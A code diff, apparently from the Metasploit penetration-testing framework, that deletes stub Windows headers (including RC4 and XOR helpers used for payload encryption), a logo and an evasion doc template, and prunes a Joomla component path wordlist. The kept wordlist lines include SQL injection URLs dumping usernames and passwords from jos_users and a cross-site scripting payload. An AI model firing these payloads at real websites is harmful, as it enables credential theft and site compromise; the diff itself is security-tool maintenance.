-    int rnd = S[(S[i] + S[j]) % N];
-    ciphertext[n] = rnd ^ plaintext[n];
-  }
-
-  return 0;
-}
-
-int RC4(char *key, char *plaintext, unsigned char *ciphertext, int plainTextSize) {
-  unsigned char S[N];
-  KSA(key, S);
-  PRGA(S, plaintext, ciphertext, plainTextSize);
-  return 0;
-}

data/headers/windows/stddef.h

@@ -1,128 +0,0 @@
-//
-// License:
-// https://github.com/rapid7/metasploit-framework/blob/master/LICENSE
-//
-
-#define NULL ((void *)0)
-#define TRUE 1
-#define FALSE 0
-#define true 1
-#define false 0
-#define VOID void
-#define _tWinMain WinMain
-#define CALLBACK __stdcall
-#define WINAPI __stdcall
-#define APIENTRY WINAPI
-#define BUFSIZ  512
-#define _INTERNAL_BUFSIZ 4096
-#define _SMALL_BUFSIZ 512
-#define _NSTREAM_ 512
-#define _IOB_ENTRIES 20
-#define RAND_MAX 0x7fff
-#define EOF (-1)
-#define SEEK_CUR 1
-#define SEEK_END 2
-#define SEEK_SET 0
-#define FILENAME_MAX 260
-#define FOPEN_MAX 20
-#define _SYS_OPEN 20
-#define _TMP_MAX_S 2147483647
-#define stdin (&__iob_func()[0])
-#define stdout (&__iob_func()[1])
-#define stderr (&__iob_func()[2])
-#define _IOREAD 0x0001
-#define _IOWRT 0x0002
-#define _IOFBF 0x0000
-#define _IOLBF 0x0040
-#define _IONBF 0x0004
-#define _IOMYBUF 0x0008
-#define _IOEOF 0x0010
-#define _IOERR 0x0020
-#define _IOSTRG 0x0040
-#define _IORW 0x0080
-#define _TWO_DIGIT_EXPONENT 0x1
-#define DLL_PROCESS_ATTACH 1
-#define DLL_PROCESS_DETACH 0
-#define DLL_THREAD_ATTACH 2
-#define DLL_THREAD_DETACH 3
-
-typedef char CHAR;
-typedef CHAR* PCHAR;
-typedef const char* LPCTSTR;
-typedef const char* LPCSTR;
-typedef const CHAR* PCSTR;
-typedef char* LPSTR;
-typedef char* LPTSTR;
-typedef CHAR* PSTR;
-typedef unsigned char BYTE;
-typedef unsigned short WORD;
-typedef unsigned long DWORD;
-typedef unsigned int DWORD32;
-typedef WORD* LPWORD;
-typedef long HRESULT;
-typedef long LONG;
-typedef float FLOAT;
-typedef DWORD COLORREF;
-typedef WORD ATOM;
-typedef BYTE BOOLEAN;
-typedef void* HANDLE;
-typedef HANDLE SC_HANDLE;
-typedef HANDLE HINSTANCE;
-typedef HINSTANCE HMODULE;
-typedef HANDLE HHOOK;
-typedef HANDLE HCONV;
-typedef HANDLE HCONFLIST;
-typedef HANDLE HFONT;
-typedef HANDLE HGLOBAL;
-typedef HANDLE HICON;
-typedef HANDLE HKEY;
-typedef HANDLE HGLOBAL;
-typedef HKEY* PHKEY;
-typedef HANDLE HKL;
-typedef unsigned char UCHAR;
-typedef char TCHAR;
-typedef char CCHAR;
-typedef int INT;
-typedef unsigned int UINT;
-typedef unsigned int UINT_PTR;
-typedef unsigned long ULONG;
-typedef unsigned long ULONG_PTR;
-typedef long* LPLONG;
-typedef long LONG_PTR;
-typedef unsigned short USHORT;
-typedef unsigned short WORD;
-typedef unsigned int size_t;
-typedef size_t* PSIZE_T;
-typedef DWORD* LPDWORD;
-typedef DWORD* PDWORD;
-typedef HANDLE* LPHANDLE;
-typedef HANDLE* PHANDLE;
-typedef unsigned short u_short;
-typedef BYTE* LPBYTE;
-typedef BYTE* PBYTE;
-typedef void* PVOID;
-typedef void* LPVOID;
-typedef void* LPCVOID;
-typedef ULONG_PTR DWORD_PTR;
-typedef void* HWND;
-typedef int BOOL;
-typedef int bool;
-typedef BOOL* PBOOL;
-typedef LONG_PTR LRESULT;
-typedef UINT_PTR WPARAM;
-typedef LONG_PTR LPARAM;
-typedef long NTSTATUS;
-typedef ULONG* PULONG;
-typedef ULONG REGSAM;
-typedef LRESULT (CALLBACK* HOOKPROC)(int, WPARAM, LPARAM);
-typedef __stdcall int (*FARPROC)();
-typedef struct _iobuf FILE;
-typedef long fpos_t;
-typedef int* LPINT;
-
-typedef struct {
-   unsigned int gp_offset;
-   unsigned int fp_offset;
-   void *overflow_arg_area;
-   void *reg_save_area;
-} va_list[1];

data/headers/windows/stdio.h

@@ -1,40 +0,0 @@
-//
-// License:
-// https://github.com/rapid7/metasploit-framework/blob/master/LICENSE
-//
-
-FILE* popen(const char*, const char*);
-int pclose(FILE*);
-int fscanf(FILE*, const char*, ...);
-int scanf(const char*, ...);
-int sscanf(const char*, const char*, ...);
-int vfscanf(FILE*, const char*, va_list);
-int vsscanf(const char*, const char*, va_list);
-int fclose(FILE*);
-void clearerr(FILE*);
-int feof(FILE*);
-int ferror(FILE*);
-int fflush(FILE*);
-int fgetpos(FILE*, fpos_t*);
-FILE *fopen(const char*, const char*);
-size_t fread(void*, size_t, size_t, FILE*);
-FILE *freopen(const char*, const char*, FILE*);
-int fseek(FILE*, long int, int);
-int fsetpos(FILE*, const fpos_t*);
-long int ftell(FILE*);
-size_t fwrite(const void*, size_t, size_t, FILE*);
-int remove(const char*);
-int rename(const char*, const char*);
-void rewind(FILE*);
-void setbuf(FILE*, char*);
-int setvbuf(FILE*, char*, int, size_t);
-FILE *tmpfile(void);
-char *tmpnam(char*);
-int fprintf(FILE*, const char*, ...);
-int printf(const char*, ...);
-int sprintf(char*, const char*, ...);
-int vfprintf(FILE*, const char*, va_list);
-int vsprintf(char*, const char*, va_list);
-int vsnprintf(char*, size_t, const char*, va_list);
-int vasprintf(char**, const char*, va_list);
-int vdprintf(int, const char*, va_list);

data/headers/windows/stdlib.h

@@ -1,48 +0,0 @@
-//
-// License:
-// https://github.com/rapid7/metasploit-framework/blob/master/LICENSE
-//
-
-typedef struct _div_t {
-  int quot;
-  int rem;
-} div_t;
-
-typedef struct _ldiv_t {
-  long quot;
-  long rem;
-} ldiv_t;
-
-typedef struct _lldiv_t {
-  long long quot;
-  long long rem;
-} lldiv_t;
-
-int rand(void);
-void srand(unsigned);
-void* malloc(size_t);
-void* realloc(void*, size_t);
-void free(void*);
-double atof(const char*);
-double strtod(const char*, char**);
-float strtof(const char*, char**);
-long int strtol(const char*, char**, int);
-long double strtold(const char*, char**);
-int atoi(const char*);
-void abort(void);
-void exit(int);
-int atexit(void (*function)(void));
-char* getenv(const char*);
-int setenv(const char*, const char*, int);
-int putenv(char*);
-int unsetenv(const char*);
-void *bsearch(const void*, const void*, size_t, size_t, int (*compar)(const void*, const void*));
-void qsort(void*, size_t, size_t, int (*compar)(const void*, const void*));
-int abs(int);
-int mblen(const char*, size_t);
-int system(const char*);
-long int labs(long int);
-div_t div(int, int);
-ldiv_t ldiv(long int, long int);
-void* malloc (size_t size);
-

data/headers/windows/xor.h

@@ -1,11 +0,0 @@
-//
-// License:
-// https://github.com/rapid7/metasploit-framework/blob/master/LICENSE
-//
-
-void xor(char* dest, char* src, char key, int len) {
-  for (int i = 0; i < len; i++) {
-    char c = src[i] ^ key;
-    dest[i] = c;
-  }
-}

data/logos/metasploit-v5.txt

@@ -1,25 +0,0 @@
-%clr%red               .;lxO0KXXXK0Oxl:.
-           ,o0WMMMMMMMMMMMMMMMMMMKd,
-        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
-      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
-    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
-   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
-  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
- oMMMMMMMMMMx.                    dMMMMMMMMMMx
-.WMMMMMMMMM:                       :MMMMMMMMMM,
-xMMMMMMMMMo                         lMMMMMMMMMO
-NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
-MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
-NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
-xMMMMMMMMMd                        ,0MMMMMMMMMMK;
-.WMMMMMMMMMc                         'OMMMMMM0,
- lMMMMMMMMMMk.                         .kMMO'
-  dMMMMMMMMMMWd'                         ..
-   cWMMMMMMMMMMMNxc'.%clr%whi                ##########%clr
-%red    .0MMMMMMMMMMMMMMMMWc%clr%whi            #+#    #+#%clr
-%red      ;0MMMMMMMMMMMMMMMo.%clr%whi          +:+%clr
-%red        .dNMMMMMMMMMMMMo%clr          +%whi#+%clr+:++#+
-%red           'oOWMMMMMMMMo%clr                +:+
-%red               .,cdkO0K;%clr        :+:    :+:                                
-                                :::::::+:
-                      %whiMetasploit%clr

data/logos/missile-command.txt

@@ -1,7 +1,7 @@
 %clr
  ______________________________________________________________________________
 |                                                                              |
-|                   %bld%grnMETASPLOIT CYBER MISSILE COMMAND V5%clr                        |
+|                   %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr                        |
 |______________________________________________________________________________|
       %yel\%clr                                  %yel/%clr                      %yel/%clr
        %yel\%clr     .                          %yel/%clr                      %yel/%clr            x
@@ -25,6 +25,6 @@
 ####    %yel/%clr    %yel\%clr %yel/%clr    %yel\%clr %yel/%clr    %yel\%clr      ###########     %yel/%clr    %yel\%clr %yel/%clr    %yel\%clr %yel/%clr    %yel\%clr      ####
 ################################################################################
 ################################################################################
-# %bldWAVE 5%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
+# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
 ################################################################################
                                                            https://metasploit.com%clr

data/markdown_doc/default_template.erb

@@ -14,21 +14,9 @@
 <%= normalize_platforms(items[:mod_platforms]) %>
 <% end %>
 
-## Module Ranking
-
-<%= normalize_rank(items[:mod_rank]) %>
-
-## Side Effects
-
-<%= normalize_side_effects(items[:mod_side_effects]) %>
-
 ## Reliability
 
-<%= normalize_reliability(items[:mod_reliability]) %>
-
-## Stability
-
-<%= normalize_stability(items[:mod_stability]) %>
+<%= normalize_rank(items[:mod_rank]) %>
 
 ## Related Pull Requests
 

data/markdown_doc/evasion_demo_template.erb

@@ -1,6 +0,0 @@
-```
-msf > use <%= mod.fullname %>
-msf <%= mod.type %>(<%= mod.shortname %>) > show options
-    ... show and set options ...
-msf <%= mod.type %>(<%= mod.shortname %>) > exploit
-```

data/wordlists/joomla.txt

@@ -14,7 +14,6 @@ administrator/
 administrator/components/
 administrator/components/com_a6mambocredits/
 administrator/components/com_a6mambohelpdesk/
-administrator/components/com_admin/
 administrator/components/com_admin/admin.admin.html.php
 administrator/components/com_astatspro/refer.php
 administrator/components/com_bayesiannaivefilter/
@@ -39,6 +38,7 @@ administrator/components/com_joomlaradiov5/
 administrator/components/com_jpack/
 administrator/components/com_jreactions/
 administrator/components/com_juser/
+administrator/components/com_admin/
 administrator/components/com_kochsuite /
 administrator/components/com_linkdirectory/
 administrator/components/com_livechat/getSavedChatRooms.php
@@ -75,1293 +75,376 @@ component/osproperty/?task=agent_register
 component/quran/index.php?option=com_quran&action=viewayat&surano=
 components/com_ clickheat/
 components/com_5starhotels/
-components/com_ContentBlogList/
-components/com_Eventing/
-components/com_Fabrik/
 components/com_Jambook/jambook.php
-components/com_K2/
-components/com_Projectfork/
-components/com_a3000/
 components/com_a6mambocredits/
 components/com_a6mambohelpdesk/
-components/com_aardvertiser/
-components/com_ab/
 components/com_ab_gallery/
-components/com_abbrev/
-components/com_abc/
-components/com_abook/
-components/com_about/
-components/com_abstract/
 components/com_acajoom/
 components/com_acctexp/
-components/com_aceftp/
 components/com_aclassf/
-components/com_aclassfb/
-components/com_aclsfgpl/
-components/com_acmisc/
-components/com_acooldebate/
-components/com_acprojects/
-components/com_acstartseite/
-components/com_acteammember/
-components/com_actions/
 components/com_activities/
 components/com_actualite/
-components/com_acymailing/
-components/com_acysms/
-components/com_adagency/
-components/com_addproperty/
-components/com_addressbook/
-components/com_adds/
-components/com_admin/
 components/com_admin/admin.admin.html.php
-components/com_adsmanager/
 components/com_advancedpoll/
-components/com_advert/
-components/com_advertisementboard/
-components/com_advertising/
-components/com_affiliatetracker/
-components/com_agency/
-components/com_agenda/
 components/com_agora/
 components/com_agoragroup/
-components/com_aicontactsafe/
-components/com_airmonoblock/
-components/com_aist/
-components/com_ajax-shoutbox/
-components/com_ajax/
 components/com_ajaxchat/
-components/com_ajaxquiz/
-components/com_akeeba/
 components/com_akobook/
 components/com_akocomment/
 components/com_akogallery
-components/com_akogallery/
-components/com_alameda/
 components/com_alberghi/
-components/com_album/
-components/com_alert/
-components/com_alfcontact/
-components/com_alfresco/
-components/com_alfurqan/
-components/com_alfurqan15x/
-components/com_allcinevid/
 components/com_allhotels/
 components/com_alphacontent/
-components/com_alphauserpoints/
 components/com_altas/
-components/com_altauserpoints/
-components/com_amblog/
-components/com_aml_2/
 components/com_amocourse/
-components/com_annonces/
-components/com_annuaire/
-components/com_answers/
-components/com_appointinator/
-components/com_appointment/
-components/com_aprice/
-components/com_arcadegames/
-components/com_archeryscores/
-components/com_artforms/
 components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
-components/com_article/
-components/com_articleman/
-components/com_articlemanager/
 components/com_articles/
 components/com_artist/
 components/com_artlinks/
-components/com_artportal/
-components/com_as/
 components/com_asortyment/
 components/com_astatspro/
-components/com_autartimonial/
-components/com_autartitarot/
-components/com_autostand/
-components/com_availcal/
-components/com_avosbillets/
-components/com_avreloaded/
-components/com_awd_song/
-components/com_awdwall/
 components/com_awesom/
-components/com_awiki/
-components/com_aysquiz/
-components/com_b2portfolio/
 components/com_babackup/
 components/com_banners/
 components/com_bayesiannaivefilter/
-components/com_bazaar/
-components/com_bbs/
-components/com_bca-rss-syndicator/
-components/com_be/
 components/com_be_it_easypartner/
 components/com_beamospetition/
-components/com_bearleague/
-components/com_beeheard/
-components/com_bfquiz_sqli/
-components/com_bfquiztrial/
-components/com_bfsurvey/
-components/com_bfsurvey_basic/
-components/com_bfsurvey_pro/
-components/com_bfsurvey_profree/
 components/com_biblestudy/
-components/com_biblioteca/
 components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
 components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
-components/com_bidding/
-components/com_biitatemplateshop/
-components/com_billyportfolio/
-components/com_biographies/
-components/com_bit/
 components/com_blog/
-components/com_blog_calendar/
-components/com_blogfactory/
-components/com_bnf/
-components/com_book/
 components/com_bookflip/
 components/com_bookjoomlas/
 components/com_booklibrary/
-components/com_booklibrary_1/
-components/com_bookmarks/
-components/com_bookpro/
 components/com_books/
-components/com_boss/
-components/com_br/
-components/com_breezingforms/
-components/com_brightweblinks/
 components/com_bsadv/
-components/com_bsq/
 components/com_bsq_sitestats/
 components/com_bsq_sitestats/external/rssfeed.php
 components/com_bsqsitestats/
-components/com_bt_media/
-components/com_bulkenquery/
-components/com_business/
-components/com_buslicense/
-components/com_ca/
-components/com_caddy/
-components/com_calcbuilder/
 components/com_calendar/
-components/com_calendario/
-components/com_calendarplanner/
 components/com_camelcitydb2/
-components/com_camp/
 components/com_candle/
-components/com_canteen/
-components/com_caproductprices/
-components/com_car/
-components/com_carman/
-components/com_cartikads/
-components/com_cartweberp/
-components/com_casino/
 components/com_casino_blackjack/
 components/com_casino_videopoker/
 components/com_casinobase/
-components/com_catalog/
 components/com_catalogproduction/
 components/com_catalogshop/
-components/com_catalogue/
 components/com_category/
-components/com_catfiltering/
-components/com_cb/
-components/com_cbcontact/
-components/com_cbe/
-components/com_cbresumebuilder/
-components/com_ccboard/
-components/com_ccinvoices/
-components/com_cckjseblod/
-components/com_ccnewsletter/
-components/com_cgtestimonial/
 components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
-components/com_checklist/
-components/com_chronoconnectivity/
-components/com_chronocontact/
 components/com_chronocontact/excelwriter/PPS/File.php
-components/com_cincopa/
 components/com_cinema/
-components/com_civicrm/
-components/com_cjlib/
-components/com_ckforms/
-components/com_clan/
-components/com_clan_members/
-components/com_clanlist/
-components/com_clantools/
 components/com_clasifier/
-components/com_classified/
 components/com_classifieds/
 components/com_clickheat/
 components/com_cloner/
-components/com_clubmanager/
 components/com_cmimarketplace/
-components/com_cmotour/
 components/com_cms/
-components/com_collector/
 components/com_colophon/
-components/com_color/
 components/com_colorlab/
-components/com_commedia/
-components/com_comments/
-components/com_community/
-components/com_communitypolls/
-components/com_communityquiz/
-components/com_communitysurveys/
-components/com_comp/
 components/com_competitions/
-components/com_component/
 components/com_comprofiler/
 components/com_comprofiler/plugin.class.php
-components/com_connect/
-components/com_contact/
-components/com_contact_enhanced/
-components/com_contactformmaker/
 components/com_contactinfo/
 components/com_content/
-components/com_contentbloglist/
-components/com_contenthistory/
-components/com_contentmap/
-components/com_controller/
-components/com_contushdvideoshare/
-components/com_convertforms/
-components/com_countries/
-components/com_coupon/
-components/com_cpeventcalendar/
-components/com_cpg/
 components/com_cpg/cpg.php
-components/com_creativecontactform/
-components/com_crhotels/
-components/com_cropimage/
 components/com_cropimage/admin.cropcanvas.php
-components/com_crowdsource/
 components/com_custompages/
-components/com_cvmaker/
-components/com_cwtags/
 components/com_cx/
-components/com_d-greinar/
 components/com_d3000/
 components/com_dadamail/
-components/com_dailymeals/
 components/com_dailymessage/
-components/com_dashboard/
-components/com_datafeeds/
-components/com_dateconverter/
 components/com_datsogallery/
 components/com_dbquery/
-components/com_dcnews/
-components/com_dcs_flashgames/
-components/com_delicious/
-components/com_departments/
 components/com_detail/
-components/com_dhforum/
-components/com_diary/
-components/com_digifolio/
 components/com_digistore/
-components/com_dioneformwizard/
-components/com_directorix/
 components/com_directory/
-components/com_dirfrm/
-components/com_discussions/
-components/com_dj-classifieds/
-components/com_djartgallery/
-components/com_djcatalog/
-components/com_djclassifieds/
 components/com_djiceshoutbox/
-components/com_dm_orders/
-components/com_dms/
 components/com_doc/
-components/com_docman/
-components/com_docmanpaypal/
-components/com_donateprocess/
-components/com_doqment/
-components/com_download-monitor/
 components/com_downloads/
-components/com_drawroot/
 components/com_ds-syndicate/
-components/com_dshop/
-components/com_dt-register/
-components/com_dtracker/
 components/com_dtregister/
-components/com_dv/
 components/com_dv/externals/phpupload/upload.php");
-components/com_dwgraphs/
-components/com_easy_youtube_gallery/
-components/com_easyblog/
 components/com_easybook/
-components/com_easydiscuss/
-components/com_easygb/
-components/com_ecommercewd/
-components/com_econtent/
-components/com_education/
-components/com_education_classes/
-components/com_ekrishta/
-components/com_elite/
-components/com_elite_experts/
 components/com_emcomposer/
-components/com_enmasse/
-components/com_ensenanzas/
-components/com_eportfolio/
-components/com_equipment/
 components/com_equotes/
-components/com_esearch/
-components/com_eshop/
-components/com_eslamiat/
 components/com_estateagent/
-components/com_event/
-components/com_eventbooking/
-components/com_eventcal/
 components/com_eventing/
-components/com_eventix/
 components/com_eventlist/
 components/com_events/
 components/com_ewriting/
-components/com_expautospro/
-components/com_expedition/
-components/com_expose/
 components/com_expose/uploadimg.php
-components/com_expose_small_rc4/
 components/com_expshop/
 components/com_extcalendar/
 components/com_extcalendar/cal_popup.php?extmode=view&extid=
 components/com_extcalendar/extcalendar.php
-components/com_extended/
 components/com_extended_registration/registration_detailed.inc.php
-components/com_extplorer-test1/
-components/com_extplorer-test2/
-components/com_extplorer-test3/
 components/com_extplorer/
-components/com_extrasearch/
-components/com_ezautos/
 components/com_ezine/
 components/com_ezstore/
-components/com_fabrik/
-components/com_facebook/
-components/com_facegallery/
 components/com_facileforms/
-components/com_family/
 components/com_fantasytournament/
 components/com_faq/
-components/com_faqbook/
-components/com_fastball/
-components/com_fbb/
-components/com_feederator/
 components/com_feederator/includes/tmsp/add_tmsp.php
-components/com_fields/
 components/com_filebase/
 components/com_filiale/
-components/com_finder/
-components/com_fireboard/
-components/com_firmy/
-components/com_flash/
 components/com_flashfun/
-components/com_flashgames/
 components/com_flashmagazinedeluxe/
-components/com_flexicontent/
 components/com_flippingbook/
-components/com_flipwall/
-components/com_flyspray/
 components/com_flyspray/startdown.php
-components/com_fm/
 components/com_fm/fm.install.php
-components/com_focalpoint/
 components/com_foevpartners/
-components/com_foobla/
-components/com_foobla_suggestions/
 components/com_football/
-components/com_forme/
-components/com_formmaker/
 components/com_formtool/
 components/com_forum/
-components/com_foto/
-components/com_foxcontact/
 components/com_fq/
-components/com_freichat/
-components/com_frontenduseraccess/
-components/com_fsave/
-components/com_fss/
-components/com_full/
 components/com_fundraiser/
-components/com_furniture/
-components/com_g2bridge/
-components/com_gadgetfactory/
 components/com_galeria/
-components/com_galleria/
 components/com_galleria/galleria.html.php
 components/com_gallery/
-components/com_gallery_wd/
-components/com_galleryxml/
-components/com_gambling/
 components/com_game/
 components/com_gameq/
-components/com_gamesbox/
-components/com_gameserver/
-components/com_ganalytics/
-components/com_gantry/
 components/com_garyscookbook/
-components/com_gbufacebook/
-components/com_gcalendar/
-components/com_gds/
 components/com_genealogy/
 components/com_geoboerse/
-components/com_geocontent/
-components/com_giftexchange/
 components/com_gigcal/
-components/com_gigfe/
-components/com_gk3_photoslide/
-components/com_gmap/
 components/com_gmaps/
-components/com_gnosis/
-components/com_golfcourseguid/
-components/com_golfcourseguide/
-components/com_google/
 components/com_googlebase/
-components/com_googlemaplocator/
-components/com_goverment/
-components/com_gpstools/
-components/com_graphics/
-components/com_grid/
-components/com_groovygallery/
-components/com_groupjive/
-components/com_groups/
 components/com_gsticketsystem/
-components/com_guesser/
 components/com_guide/
-components/com_guru/
-components/com_gurujibook/
-components/com_hashcash/
 components/com_hashcash/server.php
-components/com_hbooking/
 components/com_hbssearch/
-components/com_hdflvplayer/
-components/com_hdvideoshare/
-components/com_healthstats/
-components/com_hello/
 components/com_hello_world/
-components/com_helpdeskpro/
-components/com_hezacontent/
-components/com_hikasho/
-components/com_hmcommunity/
-components/com_horoscope/
-components/com_horses/
-components/com_hospital/
-components/com_hotbrackets/
-components/com_hotel/
-components/com_hotelguide/
 components/com_hotproperties/
 components/com_hotproperty/
 components/com_hotspots/
-components/com_hsconfig/
-components/com_htmlarea3/
 components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
-components/com_huruhelpdesk/
 components/com_hwdvideoshare/
 components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
-components/com_icagenda/
 components/com_ice/
 components/com_idoblog/
 components/com_idvnews/
-components/com_if_nexus/
-components/com_if_surfalert/
-components/com_igallery/
 components/com_ignitegallery/
-components/com_iigcatalog/
-components/com_ijoomla/
 components/com_ijoomla_archive/
 components/com_ijoomla_rss/
-components/com_imagebrowser/
-components/com_img/
-components/com_imoti/
-components/com_include/
-components/com_informations/
-components/com_inneradmission/
-components/com_installer/
 components/com_inter/
-components/com_intranet/
-components/com_intuit/
-components/com_invitex/
-components/com_iomezun/
 components/com_ionfiles/
-components/com_iproperty/
-components/com_ircmbasic/
 components/com_is/
-components/com_itarmory/
-components/com_items/
 components/com_ixxocart/
-components/com_j-projects/
 components/com_jabode/
-components/com_jacomment/
-components/com_jaextmanager/
-components/com_jajobboard/
-components/com_janews/
 components/com_jashowcase/
-components/com_javoice/
 components/com_jb2/
-components/com_jbcatalog/
-components/com_jbdiary/
-components/com_jbook/
-components/com_jbpeople/
-components/com_jbpublishdownfp/
-components/com_jbudgetsmagic/
-components/com_jbuildozer/
-components/com_jbusinessdirectory/
-components/com_jcafe/
-components/com_jcalpro/
-components/com_jcart/
 components/com_jce/
-components/com_jcollection/
-components/com_jcomments/
-components/com_jcommunity/
-components/com_jcruisereservation/
 components/com_jcs/
 components/com_jd-wiki/
 components/com_jd-wp/
-components/com_jdbexport/
-components/com_jdirectory/
-components/com_jdownloads/
-components/com_jdrugstopics/
-components/com_jeajaxeventcalendar/
-components/com_jeauction/
-components/com_jeauto/
-components/com_jeawdsong/
-components/com_jeclassifieds/
-components/com_jeclassifyads/
-components/com_jedirectory/
-components/com_jeemaarticlecollection/
-components/com_jeemasms/
-components/com_jeeventcalendar/
-components/com_jefaqpro/
-components/com_jeformcr/
-components/com_jegallery/
-components/com_jegridfolio/
-components/com_jeguestbook/
-components/com_jejob/
-components/com_jek2storymultipleform/
-components/com_jem/
-components/com_jembedall/
-components/com_jemediaplayer/
-components/com_jemembership/
-components/com_jemessenger/
-components/com_jepaypervideo/
-components/com_jepoll/
-components/com_jeportfolio/
-components/com_jepropertyfinder/
-components/com_jequestions/
-components/com_jequizmanagement/
-components/com_jequoteform/
-components/com_jereverseauction/
-components/com_jesectionfinder/
-components/com_jesubmit/
-components/com_jetext/
-components/com_jeticket/
-components/com_jetour/
-components/com_jeux/
-components/com_jevideogallery/
-components/com_jevideorate/
-components/com_jfbconnect/
-components/com_jfeedback/
-components/com_jfuploader/
-components/com_jfusion/
-components/com_jgen/
-components/com_jgive/
-components/com_jgrid/
-components/com_jhotelreservation/
-components/com_jigsaw/
 components/com_jim/
-components/com_jimtawl/
-components/com_jinc/
-components/com_jinventory/
 components/com_jjgallery/
-components/com_jlike/
-components/com_jlord_rss/
-components/com_jmarket/
 components/com_jmovies/
-components/com_jmsfileseller/
-components/com_jmsmusic/
-components/com_jnews/
-components/com_jnewsletter/
-components/com_jnewspaper/
-components/com_joaktree/
-components/com_job/
-components/com_jobads/
-components/com_jobgrokapp/
-components/com_jobgroklist/
 components/com_jobline/
-components/com_jobprofile/
-components/com_jofacebookgallery/
-components/com_joltcard/
 components/com_jombib/
-components/com_jomcomdev/
-components/com_jomdirectory/
-components/com_jomestate/
-components/com_jomholiday/
-components/com_jomres/
-components/com_jomtube/
 components/com_joobb/
-components/com_joodb/
 components/com_jooget/
 components/com_joom12pic/
-components/com_joomanager/
-components/com_joomblog/
-components/com_joomclip/
-components/com_joomdle/
-components/com_joomdoc/
-components/com_joomdocs/
-components/com_joomgalaxy/
-components/com_joomgallery&func/
-components/com_joomgallery/
-components/com_joominaflileselling/
 components/com_joomla-visites/
-components/com_joomla/
 components/com_joomla_flash_uploader/
 components/com_joomlaboard/
-components/com_joomlaconnect_be/
-components/com_joomladate/
 components/com_joomladate/ 
 components/com_joomlaflashfun/
-components/com_joomlaflickr/
 components/com_joomlalib/
-components/com_joomlapicasa2/
-components/com_joomlaquiz/
 components/com_joomlaradiov5/
-components/com_joomlaupdate/
-components/com_joomlaupdater/
 components/com_joomlavvz/
 components/com_joomlaxplorer/
 components/com_joomloads/
-components/com_joomloc/
-components/com_joomlub/
-components/com_joommail/
-components/com_joomnik/
-components/com_joomportfolio/
 components/com_joomradio/
-components/com_joomrecipe/
-components/com_joomsport/
-components/com_joomtouch/
 components/com_joomtracker/
-components/com_jooproperty/
 components/com_joovideo/
 components/com_jotloader/
 components/com_journal/
-components/com_jp_jobs/
 components/com_jpack/
 components/com_jpad/
-components/com_jphone/
-components/com_jphoto/
-components/com_jpodium/
-components/com_jprojectmanager/
-components/com_jquarks4s/
-components/com_jquickcontact/
-components/com_jr_tfb/
-components/com_jradio/
 components/com_jreactions/
-components/com_jresearch/
-components/com_jreservation/
-components/com_jreviews/
 components/com_jreviews/scripts/xajax.inc.php
-components/com_jsautoz/
-components/com_jscalendar/
-components/com_jshop/
-components/com_jsjobs/
-components/com_jsplocation/
-components/com_jsptickets/
-components/com_jssupportticket/
-components/com_jstore/
-components/com_jsubscription/
-components/com_jsupport/
-components/com_jtagcalendar /
-components/com_jtagcalendar/
-components/com_jtagmembersdirectory/
-components/com_jtagminicart/
-components/com_jticketing/
-components/com_jtickets/
-components/com_jtips/
-components/com_jtm/
-components/com_juicy/
-components/com_jukebox/
-components/com_juliaportfolio/
 components/com_jumi/
 components/com_juser/
-components/com_jux_eventon/
-components/com_jux_real_estate/
-components/com_jvcomment/
-components/com_jvehicles/
 components/com_jvideo/
-components/com_jvideoclip/
-components/com_jvideodirect/
-components/com_jvotesystem/
-components/com_jw_allvideos/
-components/com_jwhmcs/
-components/com_jwmmxtd/
 components/com_k2/
-components/com_k2ajaxsearch/
-components/com_k2store/
 components/com_kbase/
-components/com_king/
-components/com_kissgallery/
-components/com_kk/
-components/com_kkcontent/
-components/com_knowledgebase/
 components/com_knowledgebase/fckeditor/fckeditor.js
 components/com_kochsuite /
-components/com_kochsuite/
-components/com_komento/
-components/com_konsultasi/
-components/com_kp/
-components/com_ksadvertiser/
 components/com_kunena/
-components/com_kunena_google_map_no_geocode/
-components/com_lead/
-components/com_leader/
 components/com_letterman/
 components/com_lexikon/
-components/com_libros/
 components/com_linkdirectory/
-components/com_linkr/
-components/com_listbingo/
-components/com_listing/
 components/com_listoffreeads/
-components/com_livechat/
 components/com_livechat/getSavedChatRooms.php
 components/com_livechat/xmlhttp.php
 components/com_liveticker/
 components/com_lm/
 components/com_lmo/
-components/com_lms/
-components/com_lmsking/
-components/com_loginbox/
-components/com_loudmounth/
 components/com_loudmounth/includes/abbc/abbc.class.php
 components/com_loudmouth/
-components/com_lovefactory/
 components/com_lowcosthotels/
-components/com_lucygames/
-components/com_lurm/
 components/com_lurm_constructor/admin.lurm_constructor.php
-components/com_lyftenbloggie/
-components/com_macgallery/
-components/com_machine/
 components/com_mad4joomla/
-components/com_madeira/
 components/com_madeira/img.php
-components/com_magazine/
-components/com_magazine_3_0_1/
-components/com_magicdealsweb/
-components/com_maian15/
-components/com_maianmedia/
 components/com_maianmusic/
 components/com_mailarchive/
 components/com_mailto/
-components/com_mambatstaff/
 components/com_mambatstaff/mambatstaff.php
 components/com_mambelfish/
 components/com_mambospgm/
-components/com_mambowiki/
 components/com_mambowiki/MamboLogin.php
-components/com_manager/
-components/com_maplocator/
-components/com_maqmahelpdesk/
-components/com_market/
 components/com_marketplace/
-components/com_markt/
-components/com_masterforms/
-components/com_matamko/
 components/com_mcquiz/
 components/com_mdigg/
-components/com_media/
 components/com_media_library/
